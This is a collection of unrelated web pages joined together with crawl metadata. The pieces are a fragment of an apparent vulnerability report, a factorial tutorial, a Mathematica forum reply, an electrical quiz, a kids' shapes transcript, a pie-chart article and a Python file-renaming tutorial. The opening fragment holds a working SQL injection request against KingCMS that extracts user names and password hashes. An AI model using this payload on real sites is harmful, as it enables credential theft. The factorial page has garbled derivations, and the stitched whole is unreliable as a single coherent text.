'' : \" LIMIT \\$limit\";\t\treturn \\$this->get(\\$sql);\t}``\n\nKingcms可以报错,因此\n\n``jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23``", null, "" ]
[ null, "http://wimg.zone.ci/upload/201503/19235858e4b1db7fe86037ec664f830d547b386c.jpg", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.85119927,"math_prob":0.98458874,"size":516,"snap":"2022-40-2023-06","text_gpt3_token_len":323,"char_repetition_ratio":0.115234375,"word_repetition_ratio":0.0,"special_character_ratio":0.19186047,"punctuation_ratio":0.08695652,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9878279,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T15:11:40Z\",\"WARC-Record-ID\":\"<urn:uuid:b6b7ae99-72a5-4620-a6b4-d0af70c4d354>\",\"Content-Length\":\"29352\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:21eb649d-6d7f-4786-b374-eab1efe20a25>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb7b6583-e33f-4211-89b3-f012aeb0bac7>\",\"WARC-IP-Address\":\"172.67.210.246\",\"WARC-Target-URI\":\"https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102490\",\"WARC-Payload-Digest\":\"sha1:OAE6IEX43PGV4EIBDI5GM5CEHHDJGHXO\",\"WARC-Block-Digest\":\"sha1:OA35PM3UY2LGHDSXV66R4I2HXGOPVBGW\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499744.74_warc_CC-MAIN-20230129144110-20230129174110-00448.warc.gz\"}"}
https://www.digitmath.com/factorial-basics.html
[ "", null, "", null, "", null, "# Factorials", null, "", null, "## Basics of Factorials\n\nA Factorial is the number of unique combinations of the elements of a set so that each combination of elements represents a unique permutation of that set’s elements.\n\nLet’s look at a few examples:\n(The “!” after the integer tells us it is a Factorial)\n\n0! = 1\n1! = 1 = 1\n2! = 2 × 1 = 2\n3! = 3 × 2 × 1 = 6\n4! = 4 × 3 × 2 × 1 = 24\nn! = n (n − 1) (n − 2)… 3 × 2 × 1\n\nYes, 0! = 1. This is because an empty set, having no elements, can be ordered by (organized) only as { }, there is no other order for an empty set.\n\nThe Permutations of 0! is 1: { }\nThe permutations of 1! is 1: {1}\nThe permutations of 2! is 2: {1,2} {2,1}\nThe permutations of 3! is 6: {3,2,1} {1,2,3} {2,1,3} {2,3,1} {3,1,2} {1,3,2}\n\nIt is easy to see that as the integer of the Factorial becomes larger the complexity to determine the unique combinations, as permutations of set elements, quickly nears impossible…\n\n5! = 5 × 4 × 3 × 2 × 1 = 120\n6! = 6 × 5 × 4 × 3 × 2 × 1 = 720\n7! = 5,040\n8! = 40,320\n9! = 362,880\n10! = 10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1 = 3,628,800\n\nand observe:\n3! = 6\n4! = 3! × 4 = 6 × 4 = 24\n5! = 4! × 5 = 24 × 5 = 120\n6! = 5! × 6 = 120 × 6 = 720\n\nFrom this observation we can infer that a Factorial, (n + 1)! , is equal to n! (n + 1); Where n! is read “n factorial”. That is, the permutations of the next Factorial can always be determined by multiplying the permutations of the current Factorial, n!, by the next integer increment of the current Factorial. A formal math definition of a Factorial can now be given as:\n\n(n + 1)! = n! (n +1)\n\nA Factorial is an integer product:\nn! = n (n − 1) (n − 2) … 3 × 2 × 1\nUsing 6! to equate factors to the equation n!:\n6! = 6 × 5 × 4 × 3 × 2 × 1 = 720\nn = 6\nn − 1 = 5\nn − 2 = 4\nn − 3 = 3\nn − 4 = 2\nn − 5 = 1\n\nThis is multiplication to determine the number of permutations, unique combinations, for a given Factorial. This being said, then one Factorial can be divided by another Factorial, that is, division and multiplication are reciprocal operations. Indeed, Factorials can be divided to determine the difference of their permutations with the stipulation that for any n! / i! , 0 ≤ i ≤ n.\n\nLet’s divide 10! by 6! :\n10! / 6! =\n(10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / (6 × 5 × 4 × 3 × 2 × 1) =\n(10 × 9 × 8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / (6 × 5 × 4 × 3 × 2 × 1) =\n10 × 9 × 8 × 7 = 5,040\n… we observe that the fraction can be reduced.\n\nIf we already know the permutation values, the numerator and denominator, of the factorial division:\n10! = 3,628,800\n6! = 720\n3,628,800 / 720 = 5,040\n10! / 6! = 5,040\n\nIf we do not know the permutation values of the numerator or denominator factorials of the division:\n20! / 18! 2! =\n(The numerator is determined by denominator 18! canceling, or reducing, the first 18 integer digits of the numerator 20! to 1/1, the remaining values not reduced, are greater than 18. The integers remaining are 19 and 20)\n20 × 19 / 2! =\n20 × 19 / 2! =\n(Evaluating 2!; 2! = 2)\n20 × 19 / 2 =\n10 × 19 / 1 = 190\n\n## Quotients of Factorials\n\nA special symbol with a special definition to find quotients of factorials:\n\n(\n\nn\n\ni\n\n)\n\n“This special math symbol does not state n! is to be divided by i!”\n\nThe definition is\n\n(\n\nn\n\ni\n\n)\n\n= n! / (i! (n − i)!)\n\ni and n are integers where 0 ≤ i ≤ n\n\nIf asked to find the quotient of:\n\n(\n\n7\n\n4\n\n)\n\n= n! / (i! (n − i)!)\n= 7! / (4! (7 − 4)!) = 7! / (4! 3!) 
= (7 × 6 × 5 × 4 × 3 × 2 × 1) / ((4 × 3 × 2 × 1) (3 × 2 × 1))\n= (7 × 6 × 5) / (3 × 2 × 1) = 210 / 6 = 35\n\nWhen n = 7 and i = 4 the resulting factorial equation is 7! / (4! 3!).\nLet’s try n = 7 and i =3…\n\n(\n\n7\n\n3\n\n)\n\n= 7! / (3! (7 − 3)!) = 7! / (3! 4!) = 35\n\nThis works for any values of n and i to find quotients of factorials.\n\n(\n\n8\n\n5\n\n)\n\n= n! / (i! (n − i)!)\n= 8! / (5! (8 − 5)!) = 8! / (5! 3!) = (8 × 7 × 6 × 5 × 4 × 3 × 2 × 1) / ((5 × 4 × 3 × 2 × 1) (3 × 2 × 1))\n= (8 × 7 × 6) / (3 × 2 × 1) = 336 / 6 = 56\n\n(\n\n8\n\n3\n\n)\n\n= 8! / (3! (8 − 3)!) = 8! / (3! 5!) = 56\n\nThis behavior to determine the denominator for factorial division can be described by:\n\n(\n\nn\n\ni\n\n)\n\n=\n\n(\n\nn\n\nn − i\n\n)\n\n(\n\n9\n\n7\n\n)\n\n=\n\n(\n\n9\n\n9 − 7\n\n)\n\n=\n\n(\n\n9\n\n2\n\n)\n\nThe following math shows us why:\n\n(\n\nn\n\ni\n\n)\n\n=\n\n(\n\nn\n\nn − i\n\n)\n\nObserve that\n\n(\n\nn\n\ni\n\n)\n\n= n! / (i! (n − i)!)\n\nand\n\n(\n\nn\n\nn i\n\n)\n\n= n! / ( n! (i! (n − i)!)\n= n! / ( (n i)! (n (n − i))! ) = n! / ( (n − i)! i! )\n\nNote that [n − (n − i)]! = [n − n + i]! = i!\n\nthus\n\n(\n\nn\n\nn − i\n\n)\n\n= n! / (i! (n − i)!) =\n\n(\n\nn\n\ni\n\n)" ]
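The quotient identities above are easy to double-check with a small Python sketch (not part of the original article); `math.comb` implements exactly the definition C(n, i) = n! / (i! (n − i)!).

```python
import math

# Direct factorial quotients
print(math.factorial(10) // math.factorial(6))                          # 5040, i.e. 10!/6!
print(math.factorial(20) // (math.factorial(18) * math.factorial(2)))   # 190, i.e. 20!/(18! 2!)

# Binomial coefficients C(n, i) = n! / (i! (n - i)!)
print(math.comb(7, 4), math.comb(7, 3))   # 35 35  -> symmetry C(n, i) = C(n, n - i)
print(math.comb(8, 5), math.comb(8, 3))   # 56 56
```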
[ null, "https://www.digitmath.com/image-files/xwp948f12a2_0a_1a.jpg.pagespeed.ic.NuYSHvbEvD.jpg", null, "https://www.digitmath.com/image-files/xwp7bcfabb2_1a.png.pagespeed.ic.Nyd46ZAI-a.png", null, "https://www.digitmath.com/image-files/xmath-scroll.png.pagespeed.ic.qy1Y3XGvKS.png", null, "https://www.digitmath.com/image-files/xwp00f9f6c3_1a.png.pagespeed.ic.GXcST6qyF-.png", null, "https://www.digitmath.com/image-files/xwp47b89e40_1a.png.pagespeed.ic.3v8BI4i8G4.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7805257,"math_prob":0.9999869,"size":4311,"snap":"2022-27-2022-33","text_gpt3_token_len":1797,"char_repetition_ratio":0.15834688,"word_repetition_ratio":0.21308577,"special_character_ratio":0.5126421,"punctuation_ratio":0.18557692,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999528,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-06T19:00:17Z\",\"WARC-Record-ID\":\"<urn:uuid:94c65cb0-47c3-4213-a6b0-a96d8d244b96>\",\"Content-Length\":\"40341\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d2eba66a-ee10-44ab-b160-89fa84424892>\",\"WARC-Concurrent-To\":\"<urn:uuid:9c964865-f62a-4b2c-8173-0014f24af032>\",\"WARC-IP-Address\":\"173.247.218.77\",\"WARC-Target-URI\":\"https://www.digitmath.com/factorial-basics.html\",\"WARC-Payload-Digest\":\"sha1:5NQGTK63CPFJIBFMZLTHTYIBU2E2EMW3\",\"WARC-Block-Digest\":\"sha1:UQJF6B2CYNLXEUUYOYIM5WFIVIB5MYIW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104676086.90_warc_CC-MAIN-20220706182237-20220706212237-00094.warc.gz\"}"}
https://forums.wolfram.com/mathgroup/archive/2009/May/msg00195.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Re: defining consecutive variables\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg99442] Re: defining consecutive variables\n• From: Szabolcs <szhorvat at gmail.com>\n• Date: Wed, 6 May 2009 05:20:24 -0400 (EDT)\n• References: <gtp199\\$joi\\[email protected]>\n\n```On May 5, 12:35 pm, Jason <jbig... at uoregon.edu> wrote:\n> I have a code where I need to define a large number of variables as matri=\nces, called q1,q2,q3......qn. I'd like to be able to define them all withou=\nt writing out n assignment lines, so a Do loop seems appropriate to me but =\nI don't know how to assign sequential variable names. This gets the job don=\ne but it is really ugly IMO\n>\n> f[x_] := Table[x RandomReal[], {n, 5}, {np, 5}](*for example*)\n>\n> Do[ToExpression[\"q\" <> ToString[n] <> \"=f[n]\"], {n, 0, 40}]\n>\n> at the end of which I have 41 matrices which I can call as q0,q1, etc. Is=\nthis the best way to accomplish this task?\n>\n\nConsider using expressions of the form q, q, etc. Are you doing\nanything with these variables that requires them to be atomic symbols\n(instead of compound expressions like q)?\n\nDo[q[i] = f[i], {i,0,40}]\n\nAlso, do you really need all these matrices to have a unique name? It\nsounds like you might need to iterate over them several times (or\nperform identical calculations with all of them). Couldn't you just\nuse a simple list of matrices instead?\n\n```\n\n• Prev by Date: Re: Do some definite integral calculation.\n• Next by Date: Re: Reading csv with ;\n• Previous by thread: Re: defining consecutive variables\n• Next by thread: Re: defining consecutive variables" ]
[ null, "https://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "https://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "https://forums.wolfram.com/mathgroup/images/numbers/9.gif", null, "https://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9054975,"math_prob":0.8707101,"size":1353,"snap":"2023-40-2023-50","text_gpt3_token_len":393,"char_repetition_ratio":0.088954784,"word_repetition_ratio":0.00862069,"special_character_ratio":0.31707317,"punctuation_ratio":0.18892509,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9642835,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-29T20:43:02Z\",\"WARC-Record-ID\":\"<urn:uuid:5c037b35-3b58-412d-9c82-a464d54bb834>\",\"Content-Length\":\"44815\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:db4dd272-8681-4193-aaa6-3e1f169096e7>\",\"WARC-Concurrent-To\":\"<urn:uuid:d26dbcdd-ce3d-4e4e-b207-abce9ff195b6>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"https://forums.wolfram.com/mathgroup/archive/2009/May/msg00195.html\",\"WARC-Payload-Digest\":\"sha1:2IN3443HIOCNWIJ7C2DRSJ5LIXMFLY2Q\",\"WARC-Block-Digest\":\"sha1:UA7IT5SIFA7FM3GBT6IQDXSIQJ5BSUE7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510528.86_warc_CC-MAIN-20230929190403-20230929220403-00428.warc.gz\"}"}
https://www.coep.in/electrical-engineering-mcq/network-analysis-1/
[ "# Network Analysis 1\n\nElectrical Engineering MCQ Question Papers: Campus Placement\n\nSubject: Network Analysis 1\n\nPart 1: List for questions and answers of Network Analysis\n\nQ1. An RLC series circuit is under damped. To make it over damped, the value of R\n\na) Has to be increased\n\nb) Has to be decreased\n\nc) Has to be increased to infinity\n\nd) Has to be reduced to zero\n\nQ2. Henry is equivalent to\n\na) Volts/Ampere\n\nb) Weber/Volt\n\nc) Weber/Ampere\n\nd) Weber/Ampere2\n\nQ3. In a minimum function\n\na) The degree of numerator and denominator are equal\n\nb) The degree of numerator and denominator are unequal\n\nc) The degree of numerator is one more than degree of denominator\n\nd) The degree of numerator is one less than degree of denominator\n\nQ4. For a transmission line open circuit and short circuit impedances are 20ohm and 5 ohm. Then characteristic impedance is\n\na) 100 ohm\n\nb) 50 ohm\n\nc) 25 ohm\n\nd) 10 ohm\n\nQ5. The drift velocity of electrons is\n\na) Very small as compared to speed of light\n\nb) Equal to speed of light\n\nc) Almost equal to speed of light\n\nd) Half the speed of light\n\nQ6. Wave A = 100 sin wt and wave B = 100 cos wt. Then\n\na) Rms values of the two waves are equal\n\nb) Rms values of A is more than that of B\n\nc) Rms values of A is less than that of B\n\nd) Rms values of the two waves may or may not be equal\n\nQ7. A capacitor stores 0.15C at 5 V. Its capacitance is\n\na) 0.75 F\n\nb) 0.75 uF\n\nc) 0.03 F\n\nd) 0.03 uF\n\nQ8. A 0.5 uF capacitor is connected across a 10 V battery. After a long time, the circuit current and voltage across capacitor will be\n\na) 0.5 A and 0 V\n\nb) 0 A and 10 V\n\nc) 20 A and 5 V\n\nd) 0.05 A and 5 V\n\nQ9. The synthesis of minimum function was suggested by\n\na) O’Brune\n\nb) R. Richards\n\nc) Bott and Duffin\n\nd) None of the above\n\nQ10 .Which of the following is correct for a driving point functions?\n\na) The real parts of all poles must be negative\n\nb) The real parts of all poles and zeros must be negative\n\nc) The real parts of all poles and zeros must be negative or zero\n\nd) The real parts of all zeros must be negative\n\nQ11. In an RC series circuit R = 100 ohm and XC = 10 ohm. In this circuit\n\na) The current and voltage are in phase\n\nd) The current lags the voltage by about 6 degree\n\nQ12. The impedance of an RC series circuit is 12 ohm at f= 50 Hz. At f= 200 Hz, the impedance will be\n\na) More than 12\n\nb) Less than 3\n\nc) More than 3 ohm but less than 12 ohm\n\nd) More than 12 ohm but less than 24 ohm\n\nQ13. A current is flowing through a conductor with non-uniform area of cross-section. Then\n\na) Current will be different at different cross-sections\n\nb) Current will be the same at all the cross-sections\n\nc) Current will be different but current density will be same at all the cross-sections\n\nd) Current will be the same but current density will be different at different crosssections\n\nQ14. The electrical energy required to heat a bucket of water to a certain temperature is 2 kWh. If heat losses, are 25%, the energy input is\n\na) 2.67 kWh\n\nb) 3 kWh\n\nc) 2.5 kWh\n\nd) 3.5 kWh\n\nQ15. The current rating of a cable depends on\n\na) Length of cable\n\nb) Diameter of cable\n\nc) Both length and diameter of cable\n\nd) None of the above\n\nQ16. In an ac circuit, the maximum and minimum values of power factor can be\n\na) 2 and 0\n\nb) 1 and 0\n\nc) 0 and -1\n\nd) 1 and -1\n\nQ17. 
A two branch parallel circuit has a 20 ohm resistance and 1 H inductance in one branch and a 100 uF capacitor in the second branch. It is fed from 100 V ac supply, at resonance, the input impedance of the circuit is\n\na) 500 ohm\n\nb) 50 ohm\n\nc) 20 ohm\n\nd) 5 ohm\n\nQ18. As compared to the number of network elements in Brune synthesis, the number of network elements Bott-and Duffin in realization is\n\na) More\n\nb) Less\n\nc) Equal\n\nd) Any of the above\n\nQ19. A sinusoidal voltage has peak to peak value of 100 V. The rms value is\n\na) 50 V\n\nb) 70.7 V\n\nc) 35.35 V\n\nd) 141.41 V\n\nQ20. A capacitor is needed for an ac circuit of 230 V, 50 Hz the peak voltage rating of the capacitor should be\n\na) 230 V\n\nb) 0.5 x 230 V\n\nc) 2 x 230V\n\nd) 230/2V\n\nPart 1: List for questions and answers of Network Analysis" ]
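A few of the numerical questions above can be checked with one-line formulas. A small Python sketch (not part of the question paper) for Q4, Q7 and Q19, using the standard relations Z0 = √(Zoc·Zsc), C = Q/V and Vrms = Vpp/(2√2):

```python
import math

# Q4: characteristic impedance from open- and short-circuit impedances
z_oc, z_sc = 20.0, 5.0
print(math.sqrt(z_oc * z_sc))        # 10.0 ohm -> option (d)

# Q7: capacitance that stores 0.15 C of charge at 5 V
print(0.15 / 5)                      # 0.03 F -> option (c)

# Q19: rms value of a sine wave with 100 V peak-to-peak
print(100 / (2 * math.sqrt(2)))      # ~35.36 V -> option (c)
```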
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74492544,"math_prob":0.99216205,"size":4359,"snap":"2021-43-2021-49","text_gpt3_token_len":1405,"char_repetition_ratio":0.12950632,"word_repetition_ratio":0.079865016,"special_character_ratio":0.30098647,"punctuation_ratio":0.100196466,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9950918,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-22T21:45:51Z\",\"WARC-Record-ID\":\"<urn:uuid:443da96e-1624-4b34-ae3f-d7dc1eb55508>\",\"Content-Length\":\"85404\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:801bb22f-a753-4a08-af60-abe7b7058b2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:769c5c34-0e5c-46b7-936b-d34265d0c03a>\",\"WARC-IP-Address\":\"104.21.5.242\",\"WARC-Target-URI\":\"https://www.coep.in/electrical-engineering-mcq/network-analysis-1/\",\"WARC-Payload-Digest\":\"sha1:FAZU66WXCQTT7M7KEEV36UUGD4S7RMOS\",\"WARC-Block-Digest\":\"sha1:GSY7YMBXUD6Q6AVY5FCQFKK4JPV5HES7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585522.78_warc_CC-MAIN-20211022212051-20211023002051-00471.warc.gz\"}"}
https://h0w.is/how-is-a/cylinder-and-a-cone-different/
[ "## 3-d shapes – Cone and Cylinder | Math | Grade-1,2 | TutWay |\n\nhi kids today we will learn about two\n\nshapes cone and cylinder let's first\n\nstart with a cone this is a cone it has\n\nonly one vertex which is the tip of the\n\ncone it has only one edge which is round\n\nin shape now let's see its faces one of\n\nthe faces is round shaped on its bottom\n\nthe other face is curved surface of the\n\ncone that wraps around it\n\ngood try to find out things of this\n\nshape in your house let me show you a\n\nfew yeah these are a few examples of\n\ncone shaped objects so we have learnt\n\nthat a cone is a 3d object with one\n\nvertex one edge and two faces good now\n\nlet's learn another shape that is a\n\ncylinder this is a cylinder now let's\n\nfigure out its vertices oops it has no\n\nvertex now let's figure out its edges it\n\nhas two edges one edge is its circle on\n\nthe top the other one is the circle on\n\nthe bottom now let's figure out its\n\nfaces it has three faces one face is\n\nround shaped on the top\n\nsecond one is the curved surface that\n\nwraps around it third one is also the\n\nround shaped face on the other side of\n\nthe curved surface can you see that oh\n\nwow\n\nnow let's see some cylinder shaped\n\nthings in our house yeah these are some\n\nof the cylinders shape objects we have\n\nin our house you must be familiar with\n\nthem hey don't forget we have learned\n\ncylinder is a 3d object with two edges\n\nand three faces and no vertex good now\n\ngo ahead and take a quiz to see your\n\nprogress\n\nbye bye" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9594399,"math_prob":0.89525974,"size":1376,"snap":"2021-04-2021-17","text_gpt3_token_len":339,"char_repetition_ratio":0.13119534,"word_repetition_ratio":0.024911031,"special_character_ratio":0.21366279,"punctuation_ratio":0.0,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95359313,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-12T20:52:51Z\",\"WARC-Record-ID\":\"<urn:uuid:de786e36-fd3f-4503-9e74-e9eb4f42b978>\",\"Content-Length\":\"30201\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4081a0c0-1f5e-4f74-be14-2c9a38299a10>\",\"WARC-Concurrent-To\":\"<urn:uuid:698bf0be-a4bf-4c12-a1da-061b74e49ad3>\",\"WARC-IP-Address\":\"68.183.16.183\",\"WARC-Target-URI\":\"https://h0w.is/how-is-a/cylinder-and-a-cone-different/\",\"WARC-Payload-Digest\":\"sha1:PFHCIAD4QB6PMR3NPQ5ORXPRHQR6ENEF\",\"WARC-Block-Digest\":\"sha1:5SHX7NVJTHFMA4JPDE7Q7KLTXBAENGRZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038069133.25_warc_CC-MAIN-20210412175257-20210412205257-00293.warc.gz\"}"}
https://templatesz234.com/pie-chart-diagram-worksheet/
[ "# Pie Chart Diagram Worksheet: A Comprehensive Guide\n\nWednesday, September 27th 2023. | Chart Templates\n\n## Introduction\n\nA pie chart is a circular statistical graphic that is divided into slices to illustrate numerical proportions. It is an effective tool for visualizing data and conveying information in a concise and easily understandable format. In this article, we will discuss the importance of using pie chart diagram worksheets, how to create them, and provide you with some sample worksheets to get you started.\n\n## Why Use Pie Chart Diagram Worksheets?\n\nPie chart diagram worksheets are incredibly useful for various reasons:\n\n1. Data Visualization: Pie charts allow you to represent complex data sets in a visually appealing and easily understandable format. They provide a clear representation of proportions and make it easier to identify patterns and trends.\n\n2. Comparison: Pie charts enable you to compare the proportions of different categories or data sets. By visually representing the data, you can quickly identify which categories are dominant or have the largest share.\n\n3. Communication: Pie chart diagram worksheets are an effective way to communicate information to others. They are easy to interpret and can convey complex data in a simplified manner, making it accessible to a wider audience.\n\n## Creating a Pie Chart Diagram Worksheet\n\nTo create a pie chart diagram worksheet, follow these steps:\n\n1. Gather Data: Collect the data you want to represent in your pie chart. Ensure that the data is accurate and relevant to the topic you are discussing.\n\n2. Determine Categories: Identify the different categories or data sets that you want to represent in your pie chart. Each category will be represented by a separate slice of the pie.\n\n3. Calculate Percentages: Calculate the percentage or proportion of each category in relation to the total data set. This will determine the size of each slice in the pie chart.\n\n4. Draw the Chart: Use a charting tool or software to create the pie chart. Input the data values and labels for each category to generate the chart.\n\n5. Add Labels and Legend: Label each slice with the corresponding category or data set. Include a legend to provide additional information about the chart.\n\n6. Customize the Chart: Customize the colors, fonts, and other visual elements of the chart to enhance its appearance and make it visually appealing.\n\n7. Review and Edit: Review the completed pie chart diagram worksheet for accuracy and clarity. Make any necessary edits or adjustments before finalizing.\n\n## Sample Pie Chart Diagram Worksheets\n\nHere are five sample pie chart diagram worksheets to help you understand how they can be used:\n\n1. Pie Chart Worksheet: Population Distribution by Age Group\n\n2. Pie Chart Worksheet: Budget Allocation for a Business\n\n3. Pie Chart Worksheet: Percentage of Students Enrolled in Various Subjects\n\n4. Pie Chart Worksheet: Distribution of Sales by Product Category\n\n5. Pie Chart Worksheet: Energy Consumption by Source\n\n1. What is a pie chart diagram worksheet?\n\nA pie chart diagram worksheet is a visual representation of data divided into slices to illustrate numerical proportions.\n\n2. How can pie charts benefit data visualization?\n\nPie charts provide a clear representation of proportions and make it easier to identify patterns and trends in the data.\n\n3. 
How do I create a pie chart diagram worksheet?\n\nTo create a pie chart diagram worksheet, gather data, determine categories, calculate percentages, draw the chart, add labels and legends, customize the chart, and review/edit before finalizing.\n\n4. Can I customize the appearance of my pie chart?\n\nYes, you can customize the colors, fonts, and other visual elements of the chart to enhance its appearance and make it visually appealing.\n\n5. How can I effectively communicate information using pie chart diagram worksheets?\n\nPie chart diagram worksheets are an effective way to communicate information by simplifying complex data into an easily understandable format, making it accessible to a wider audience.\n\n## Conclusion\n\nPie chart diagram worksheets are an invaluable tool for visualizing and communicating data effectively. By following the steps outlined in this article, you can create informative and visually appealing pie chart diagram worksheets. Remember to gather accurate data, determine categories, calculate percentages, and customize the chart to enhance its appearance. Start using pie chart diagram worksheets today to present your data in a clear and engaging manner.\n\n### Tags:\n\nPie chart, Data visualization, Worksheet, Data representation, Data analysis, Pie chart diagram, Charting tool, Visual communication, Proportions, Data sets\n\ntags: , ," ]
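Following the steps outlined above, a minimal matplotlib sketch can generate a worksheet-style pie chart; the categories and percentages below are invented purely for demonstration.

```python
import matplotlib.pyplot as plt

# Hypothetical data: budget allocation for a business (shares sum to 100)
labels = ["Salaries", "Marketing", "Rent", "Equipment", "Other"]
shares = [45, 20, 15, 12, 8]

fig, ax = plt.subplots()
ax.pie(shares, labels=labels, autopct="%1.1f%%", startangle=90)  # label each slice with its percentage
ax.set_title("Budget Allocation for a Business")
ax.axis("equal")  # keep the pie circular
plt.savefig("pie_chart_worksheet.png")
```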
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.81225115,"math_prob":0.76483655,"size":4634,"snap":"2023-40-2023-50","text_gpt3_token_len":857,"char_repetition_ratio":0.17948164,"word_repetition_ratio":0.13769124,"special_character_ratio":0.18429004,"punctuation_ratio":0.13085234,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9623399,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T03:17:11Z\",\"WARC-Record-ID\":\"<urn:uuid:e229ad75-349d-4810-a097-0dec455731fa>\",\"Content-Length\":\"47284\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:565b1a8e-f4a7-4231-b0ba-e62d6019cf5d>\",\"WARC-Concurrent-To\":\"<urn:uuid:c2043c12-80b6-4ee3-8801-5b3eb1d5946f>\",\"WARC-IP-Address\":\"107.191.111.63\",\"WARC-Target-URI\":\"https://templatesz234.com/pie-chart-diagram-worksheet/\",\"WARC-Payload-Digest\":\"sha1:6NFWSJB2SOVQKI6IHSRXSYOV4I6DTHYU\",\"WARC-Block-Digest\":\"sha1:IV2E7JQUE4WRGH4JABJEVHPD3L2KCCGM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679103464.86_warc_CC-MAIN-20231211013452-20231211043452-00773.warc.gz\"}"}
https://ithelp.ithome.com.tw/articles/10229795?sc=rss.qu
[ "#", null, "3\n\n## python批量讀取資料夾檔案、修改檔案\n\npython中有好用的`os`模組,\n\n# 使用教學\n\n## 匯入os模組\n\n``````import os\n``````\n\n## 一、批量修改檔名\n\n``````# 函數功能: 在指定path路徑下,將該層檔案及資料夾名稱前加上prefix字串\ndef batch_rename(path, prefix):\nfor fname in os.listdir(path):\nnew_fname = prefix+fname\nos.rename(os.path.join(path, fname), os.path.join(path, new_fname))\n``````\n\n## 二、批量顯示檔名\n\n``````# 函數功能: 顯示指定路徑下,該層的檔案及資料夾名稱\ndef batch_showname(path):\nfor fname in os.listdir(path):\nprint(os.path.join(path, fname))\n``````\n\n## 三、遞迴顯示所有檔名\n\n``````# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\ndef find_dir(path):\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n``````\n\n# 使用範例", null, "``````import os\ndef find_dir(path):\n# 函數功能: 遞迴顯示指定路徑下的所有檔案及資料夾名稱\nfor fd in os.listdir(path):\nfull_path=os.path.join(path,fd)\nif os.path.isdir(full_path):\nprint('資料夾:',full_path)\nfind_dir(full_path)\nelse:\nprint('檔案:',full_path)\n\npath=\"./\" 